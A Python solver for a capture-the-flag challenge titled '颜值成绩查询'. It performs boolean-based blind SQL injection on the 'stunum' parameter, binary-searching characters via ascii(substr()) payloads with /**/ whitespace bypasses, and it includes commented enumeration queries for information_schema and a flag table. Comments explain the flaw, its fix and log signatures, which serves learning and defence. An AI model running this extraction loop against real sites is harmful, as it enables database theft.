颜值成绩查询
import requests
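if __name__ == "__main__":
    # Boolean-based blind SQL injection solver for the CTF challenge named in
    # the page title. The `stunum` query parameter is concatenated into the
    # request URL as an arithmetic expression, and the response text is used
    # as a true/false oracle, so the parameter evidently reaches the SQL
    # statement without being bound as a typed value.
    #
    # Defensive reading: binding `stunum` as an integer parameter (or
    # rejecting non-numeric input) removes the oracle. The traffic is also
    # easy to recognise in access logs: about seven requests per recovered
    # character, each carrying `ascii(substr(` in the query string.

    # Earlier enumeration stages the author left commented out:
    # sql = "select(database())"
    # sql = "select/**/group_concat(distinct/**/TABLE_NAME)from(information_schema.tables)where(table_schema='ctf')"
    # sql = "select/**/group_concat(distinct/**/COLUMN_NAME)from(information_schema.columns)where(table_schema='ctf')and(table_name='flag')"
    # The query is loop-invariant, so it is defined once here. It uses `/**/`
    # and parentheses instead of spaces (presumably because the challenge
    # filters whitespace; the page does not say).
    sql = "select/**/group_concat(value)from(ctf.flag)"
    base_url = "http://14753567-1903-42c7-ba3e-0e698232711b.node3.buuoj.cn/?stunum="

    result = ""
    position = 0
    while True:
        position += 1
        # Binary search over the printable ASCII range for the character at
        # `position` (1-based, as substr() expects).
        head = 32
        tail = 127
        while head < tail:
            mid = (head + tail) >> 1
            # `1^(cond)^1` evaluates to cond, so stunum becomes 1 when the
            # character code is greater than `mid` and 0 otherwise.
            payload = "1^(ascii(substr((%s),%d,1))>%d)^1" % (sql, position, mid)
            url = base_url + payload
            # A timeout keeps one stalled request from hanging the whole run.
            response = requests.get(url=url, timeout=10)
            # This marker is the "true" signal; any other body, including an
            # error page, is read as "false".
            if "Hi admin, your score is: 100" in response.text:
                head = mid + 1
            else:
                tail = mid
        # head == 32 means every comparison was false, which the script takes
        # as end of string. A literal space (code 32) in the value would stop
        # extraction early for the same reason.
        if head != 32:
            result += chr(head)
        else:
            break
        # NOTE(review): the listing's indentation was lost, so placing this
        # progress print inside the outer loop is an inference.
        print(result)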